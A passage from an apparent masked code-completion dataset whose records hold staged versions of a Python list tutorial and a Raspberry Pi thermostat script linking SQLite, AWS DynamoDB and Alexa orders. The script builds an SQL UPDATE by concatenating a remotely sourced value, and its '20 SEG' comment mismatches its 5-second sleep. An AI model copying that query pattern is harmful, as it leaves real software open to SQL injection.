print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\nlist_numbers = [1, 2, 3, 4, 5]\nsub_list_numbers = list_numbers[1:3]\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\nlist_numbers_direct = list_numbers\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\nlist_numbers_list_values = list_numbers[:]\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\nlist_numbers_copy = list_numbers.copy()\nprint('\\tUsing assignment. Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\nlist_numbers_list = list(list_numbers)\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\nlist_of_list = [[1, 2], [3, 4]]\ncopy_list_of_list = list_of_list[:]\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\ntemp_string = (\n 'Python is easy scripting language. It is easy to learn and build apps using Python.'\n )\ntemp_string_list = temp_string.split(' ')\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\ntemp_list_1 = [1, 2, 3]\ntemp_list_2 = [4, 5, 6]\ntemp_list = temp_list_1 + temp_list_2\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\ntemp_list = [5, 55, 555]\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\ntemp_string = 'I am a software tester.'\ntemp_string_list = temp_string.split()\nprint('\\tString list: ' + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint('\\tSort by length of each word: ' + str(temp_string_list))\ntemp_number_list = [3, 45, 12, 1, 99, 44]\nprint(\n \"\"\"\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\"\"\"\n )\nx = [4, 9, 2, 1]\ny = x\ny.sort()\nprint('\\t y= ' + str(y))\nprint('\\t x= ' + str(x))\nx = [4, 9, 2, 1]\nprint('\\t y= ' + str(sorted(x)))\nprint('\\t x= ' + str(x))\nprint('\\t z= ' + str(list(reversed(x))))\nprint('\\t x= ' + str(x))\n", "step-4": "# Lists are sequence of objects\n# Mutable\n# Lists are represented within square brackets and items are seperated by commas\n\n#-----------------------------------Lists-----------------------------------#\n# Lists of Numbers\nprint(\"\\n1. Lists of Numbers\")\nprint(\"\\t\" + str([1,2,3]))\n\n# Lists of Strings\nprint(\"\\n2. Lists of Strings\")\nprint(\"\\t\" + str([\"Lemon\",\"Mango\",\"Papaya\"]))\n\nlist_fruits =[\"Lemon\",\"Mango\",\"Papaya\"]\nprint(\"\\tMy favorite fruit is \" + list_fruits[1])\n\nprint(\"\\n3. List operations\")\n#Replace items within list\nlist_fruits[2]=\"Water Melons\"\nprint(\"\\tNew List: \" + str(list_fruits))\n\n#Create Empty List\nlist_Organizations = []\nprint(\"\\n5. Create empty list\")\nprint(\"\\tList of Organizations: \" + str(list_Organizations))\n\n#Add values to list\nprint(\"\\n5. Add values to list\")\nlist_Organizations.append(\"Microsoft\")\nlist_Organizations.append(\"Amazon\")\nlist_Organizations.append(\"Google\")\nprint(\"\\tAppend List of Organizations: \" + str(list_Organizations))\n\n#List of characters within string\nprint(\"\\tList of characters in string:\" + str(list(\"Sandeep Dhamale\")))\n\n# Retrieve List using for loop\nprint(\"\\n6. Retrieve List using for loop\")\nfor organization in list_Organizations:\n print(\"\\t\" + organization)\n\n# Get specific elements within list: Slicing\nprint(\"\\n7. Get specific elements within list: Slicing\")\nlist_numbers = [1,2,3,4,5]\nsub_list_numbers = list_numbers[1:3]\nprint(\"\\tSub list: \" + str(sub_list_numbers))\nprint(\"\\tLast element in list: \" + str(list_numbers[-1]))\nprint(\"\\tGet all elements in list except first and lasr: \" + str(list_numbers[1:-1]))\nprint(\"\\tElements from index 2 in list: \" + str(list_numbers[2:]))\nprint(\"\\tElements till index 4 in list: \" + str(list_numbers[:4]))\n\n#Copying Lists to other list - Shallow copy\nprint(\"\\n8. Copying Lists to other list\")\nlist_numbers_direct = list_numbers\nprint(\"\\tUsing assignment. Is list_numbers_direct is list_numbers \" + str(list_numbers_direct is list_numbers))\n\nlist_numbers_list_values = list_numbers[:]\nprint(\"\\tUsing assignment. Is list_numbers_list_values is list_numbers \" + str(list_numbers_list_values is list_numbers))\n\nlist_numbers_copy = list_numbers.copy()\nprint(\"\\tUsing assignment. Is list_numbers_copy is list_numbers \" + str(list_numbers_copy is list_numbers))\n\nlist_numbers_list = list(list_numbers)\nprint(\"\\tUsing assignment. Is list_numbers_list is list_numbers \" + str(list_numbers_list is list_numbers))\n\nprint(\"\\n9. Note: Although the copies are not equal the objects inside the lists are equal\")\nlist_of_list = [[1,2],[3,4]]\ncopy_list_of_list = list_of_list[:]\nprint(\"\\tcopy_list_of_list is list_of_list: \" + str(copy_list_of_list is list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\nprint(\"\\tEven if the values are modified e.g. append the list will be same\")\nlist_of_list[0].append('a')\nprint(\"\\tlist_of_list: \" + str(list_of_list))\nprint(\"\\tcopy_list_of_list: \" + str(copy_list_of_list))\nprint(\"\\tcopy_list_of_list[element] is list_of_list[element]: \" + str(copy_list_of_list[0] is list_of_list[0]))\n\nprint(\"\\n10.Search in a list: list.index() - Returns the first matched element\")\ntemp_string = \"Python is easy scripting language. It is easy to learn and build apps using Python.\"\ntemp_string_list = temp_string.split(\" \")\nprint(\"\\tString: \" + temp_string)\nprint(\"\\tString list: \" + str(temp_string_list))\nprint(\"\\tSearch a sub string in string list using list.index(): \" + str(temp_string_list.index(\"scripting\")))\n\nprint(\"\\n11.Count occurrence of substring in list\")\nprint(\"\\tCount occurrence of substring Python: \" + str(temp_string_list.count(\"easy\")))\n\nprint(\"\\n12.Remove substring from string list\")\ndel temp_string_list[3]\nprint(\"\\tA. Remove substring from list using del (by index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\ntemp_string_list.remove(\"learn\")\nprint(\"\\tB. Remove substring from list using remove (by value): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n12.Insert a substring in string. list.insert()\")\ntemp_string_list.insert(3, \"scripting\")\nprint(\"\\tA. Insert substring to list (at index): \" + str(temp_string_list))\nprint(\"\\tOriginal string is unaffected: \" + str(temp_string))\n\nprint(\"\\n13.Concatenating lists.\")\ntemp_list_1=[1,2,3]\ntemp_list_2 = [4,5,6]\ntemp_list = temp_list_1 + temp_list_2\nprint(\"\\ta. temp_list = temp_list_1 + temp_list_2 = \" + str(temp_list))\ntemp_list+=temp_list\nprint(\"\\tb. temp_list += temp_list \" + str(temp_list))\ntemp_list.extend([7,8,9])\nprint(\"\\tc. temp_list.extend() \" + str(temp_list))\n\nprint(\"\\n14. Reversing lists.\")\ntemp_list.reverse()\nprint(\"Reverse temp list: \"+ str(temp_list))\n\nprint(\"\\n15. Sorting lists.\")\ntemp_list = [5,55,555]\ntemp_list.sort()\nprint(\"\\tSorted list: \" + str(temp_list))\ntemp_list.sort(reverse=True)\nprint(\"\\tSorted list: \" + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\ntemp_string = \"I am a software tester.\"\ntemp_string_list = temp_string.split()\nprint(\"\\tString list: \" + str(temp_string_list))\ntemp_string_list.sort(key=len)\nprint(\"\\tSort by length of each word: \" + str(temp_string_list))\ntemp_number_list=[3,45,12,1,99,44]\n\nprint(\"\\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.\")\nx=[4, 9, 2, 1]\ny = x\ny.sort()\nprint(\"\\t y= \" + str(y))\nprint(\"\\t x= \" + str(x))\n\nx=[4, 9, 2, 1]\nprint(\"\\t y= \" + str(sorted(x)))\nprint(\"\\t x= \" + str(x))\nprint(\"\\t z= \" + str(list(reversed(x))))\nprint(\"\\t x= \" + str(x))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import boto3 import time import datetime from datetime import date import sqlite3 import logging import logging.handlers from decimal import * ### LOGS CONFIGURATION ### LOG_FILENAME = '/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out' # Set up a specific logger with our desired output level my_logger = logging.getLogger('MyLogger') my_logger.setLevel(logging.DEBUG) # Add the log message handler to the logger handler = logging.handlers.RotatingFileHandler( LOG_FILENAME, maxBytes=25000, backupCount=10) formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') handler.setFormatter(formatter) my_logger.addHandler(handler) ### SQLITE3 CONNECTION ### conn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db') # Para poder utilizar nombres de columnas conn.row_factory = sqlite3.Row c = conn.cursor() ### CONECT TO DYNAMODB IN AWS client = boto3.resource('dynamodb') table_thermostat_status = client.Table("thermostat_status") table_thermostat_alexa_order = client.Table("thermostat_alexa_order") while 1: ### READ DESIRE AND REAL TEMPERATURE c.execute("SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);") row=c.fetchone() my_logger.debug("Temp actual: " + str(row["temp"]) + " temp des: "+ str(row["tem_des"]) + " Estado Caldera: " + str(row["heating"])) read_date = row["day"] real_temp = row["temp"] desire_temp = row["tem_des"] heating_status = row["heating"] table_thermostat_status.put_item(TableName='thermostat_status', Item={'id' : 1, 'desire_temp' : Decimal(desire_temp) , 'real_temp' : Decimal(real_temp) , 'status' : heating_status , 'status_date':str(datetime.datetime.now())}) ### SEARCH FOR ANY ALEXA ORDER IN AWS DYNAMODB ### alexa_order = table_thermostat_alexa_order.get_item(TableName='thermostat_alexa_order' , Key={'id' : 1}) if 'Item' in (alexa_order): my_logger.debug("Hay orden de Alexa con temperatura = " + str(alexa_order['Item']['desire_temp'])) c.execute("UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP="+str(alexa_order['Item']['desire_temp'])) conn.commit() table_thermostat_alexa_order.delete_item(TableName='thermostat_alexa_order' , Key={'id' : 1}) my_logger.debug("Orden alexa eliminada") else: my_logger.debug("No hay orden de Alexa") ### DELAY 20 SEG time.sleep(5)
normal
{ "blob_id": "fcc75550e1317a15c36bc8100c28af59b68e1381", "index": 1571, "step-1": "<mask token>\n", "step-2": "<mask token>\nmy_logger.setLevel(logging.DEBUG)\n<mask token>\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\n<mask token>\nwhile 1:\n c.execute(\n 'SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);')\n row = c.fetchone()\n my_logger.debug('Temp actual: ' + str(row['temp']) + ' temp des: ' +\n str(row['tem_des']) + ' Estado Caldera: ' + str(row['heating']))\n read_date = row['day']\n real_temp = row['temp']\n desire_temp = row['tem_des']\n heating_status = row['heating']\n table_thermostat_status.put_item(TableName='thermostat_status', Item={\n 'id': 1, 'desire_temp': Decimal(desire_temp), 'real_temp': Decimal(\n real_temp), 'status': heating_status, 'status_date': str(datetime.\n datetime.now())})\n alexa_order = table_thermostat_alexa_order.get_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n if 'Item' in alexa_order:\n my_logger.debug('Hay orden de Alexa con temperatura = ' + str(\n alexa_order['Item']['desire_temp']))\n c.execute('UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=' + str(\n alexa_order['Item']['desire_temp']))\n conn.commit()\n table_thermostat_alexa_order.delete_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n my_logger.debug('Orden alexa eliminada')\n else:\n my_logger.debug('No hay orden de Alexa')\n time.sleep(5)\n", "step-3": "<mask token>\nLOG_FILENAME = '/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out'\nmy_logger = logging.getLogger('MyLogger')\nmy_logger.setLevel(logging.DEBUG)\nhandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=25000,\n backupCount=10)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\nconn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db')\nconn.row_factory = sqlite3.Row\nc = conn.cursor()\nclient = boto3.resource('dynamodb')\ntable_thermostat_status = client.Table('thermostat_status')\ntable_thermostat_alexa_order = client.Table('thermostat_alexa_order')\nwhile 1:\n c.execute(\n 'SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);')\n row = c.fetchone()\n my_logger.debug('Temp actual: ' + str(row['temp']) + ' temp des: ' +\n str(row['tem_des']) + ' Estado Caldera: ' + str(row['heating']))\n read_date = row['day']\n real_temp = row['temp']\n desire_temp = row['tem_des']\n heating_status = row['heating']\n table_thermostat_status.put_item(TableName='thermostat_status', Item={\n 'id': 1, 'desire_temp': Decimal(desire_temp), 'real_temp': Decimal(\n real_temp), 'status': heating_status, 'status_date': str(datetime.\n datetime.now())})\n alexa_order = table_thermostat_alexa_order.get_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n if 'Item' in alexa_order:\n my_logger.debug('Hay orden de Alexa con temperatura = ' + str(\n alexa_order['Item']['desire_temp']))\n c.execute('UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=' + str(\n alexa_order['Item']['desire_temp']))\n conn.commit()\n table_thermostat_alexa_order.delete_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n my_logger.debug('Orden alexa eliminada')\n else:\n my_logger.debug('No hay orden de Alexa')\n time.sleep(5)\n", "step-4": "import boto3\nimport time\nimport datetime\nfrom datetime import date\nimport sqlite3\nimport logging\nimport logging.handlers\nfrom decimal import *\nLOG_FILENAME = '/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out'\nmy_logger = logging.getLogger('MyLogger')\nmy_logger.setLevel(logging.DEBUG)\nhandler = logging.handlers.RotatingFileHandler(LOG_FILENAME, maxBytes=25000,\n backupCount=10)\nformatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\nconn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db')\nconn.row_factory = sqlite3.Row\nc = conn.cursor()\nclient = boto3.resource('dynamodb')\ntable_thermostat_status = client.Table('thermostat_status')\ntable_thermostat_alexa_order = client.Table('thermostat_alexa_order')\nwhile 1:\n c.execute(\n 'SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);')\n row = c.fetchone()\n my_logger.debug('Temp actual: ' + str(row['temp']) + ' temp des: ' +\n str(row['tem_des']) + ' Estado Caldera: ' + str(row['heating']))\n read_date = row['day']\n real_temp = row['temp']\n desire_temp = row['tem_des']\n heating_status = row['heating']\n table_thermostat_status.put_item(TableName='thermostat_status', Item={\n 'id': 1, 'desire_temp': Decimal(desire_temp), 'real_temp': Decimal(\n real_temp), 'status': heating_status, 'status_date': str(datetime.\n datetime.now())})\n alexa_order = table_thermostat_alexa_order.get_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n if 'Item' in alexa_order:\n my_logger.debug('Hay orden de Alexa con temperatura = ' + str(\n alexa_order['Item']['desire_temp']))\n c.execute('UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=' + str(\n alexa_order['Item']['desire_temp']))\n conn.commit()\n table_thermostat_alexa_order.delete_item(TableName=\n 'thermostat_alexa_order', Key={'id': 1})\n my_logger.debug('Orden alexa eliminada')\n else:\n my_logger.debug('No hay orden de Alexa')\n time.sleep(5)\n", "step-5": "import boto3\nimport time\nimport datetime\nfrom datetime import date\nimport sqlite3\nimport logging\nimport logging.handlers\nfrom decimal import *\n\n### LOGS CONFIGURATION ### \nLOG_FILENAME = '/home/pi/Thermostat/alexaThermostat/logs/alexaThermostat.out'\n# Set up a specific logger with our desired output level\nmy_logger = logging.getLogger('MyLogger')\nmy_logger.setLevel(logging.DEBUG)\n# Add the log message handler to the logger\nhandler = logging.handlers.RotatingFileHandler(\n LOG_FILENAME, maxBytes=25000, backupCount=10)\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nhandler.setFormatter(formatter)\nmy_logger.addHandler(handler)\n\n\n\n### SQLITE3 CONNECTION ###\nconn = sqlite3.connect('/home/pi/Thermostat/backThermostat/thermostat.db')\n# Para poder utilizar nombres de columnas\nconn.row_factory = sqlite3.Row\nc = conn.cursor()\n\n\n### CONECT TO DYNAMODB IN AWS\nclient = boto3.resource('dynamodb')\ntable_thermostat_status = client.Table(\"thermostat_status\")\ntable_thermostat_alexa_order = client.Table(\"thermostat_alexa_order\")\n\n\nwhile 1:\n\t### READ DESIRE AND REAL TEMPERATURE\n\tc.execute(\"SELECT * FROM TEMP_HIST WHERE ID=(SELECT MAX(ID) FROM TEMP_HIST);\")\n\trow=c.fetchone()\n\tmy_logger.debug(\"Temp actual: \" + str(row[\"temp\"]) + \" temp des: \"+ str(row[\"tem_des\"]) + \" Estado Caldera: \" + str(row[\"heating\"]))\n\tread_date = row[\"day\"]\n\treal_temp = row[\"temp\"]\n\tdesire_temp = row[\"tem_des\"]\n\theating_status = row[\"heating\"]\n\n\ttable_thermostat_status.put_item(TableName='thermostat_status', Item={'id' : 1, 'desire_temp' : Decimal(desire_temp) , 'real_temp' : Decimal(real_temp) , 'status' : heating_status , 'status_date':str(datetime.datetime.now())})\n \n\t### SEARCH FOR ANY ALEXA ORDER IN AWS DYNAMODB ###\n\talexa_order = table_thermostat_alexa_order.get_item(TableName='thermostat_alexa_order' , Key={'id' : 1})\n\n\tif 'Item' in (alexa_order):\n\t\tmy_logger.debug(\"Hay orden de Alexa con temperatura = \" + str(alexa_order['Item']['desire_temp']))\n\t\tc.execute(\"UPDATE MANUAL_PROGRAM SET ACTIVE=1, TEMP=\"+str(alexa_order['Item']['desire_temp']))\n\t\tconn.commit()\n\t\ttable_thermostat_alexa_order.delete_item(TableName='thermostat_alexa_order' , Key={'id' : 1})\n\t\tmy_logger.debug(\"Orden alexa eliminada\")\n\telse:\n\t\tmy_logger.debug(\"No hay orden de Alexa\")\n\n \n\t### DELAY 20 SEG\n\ttime.sleep(5)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]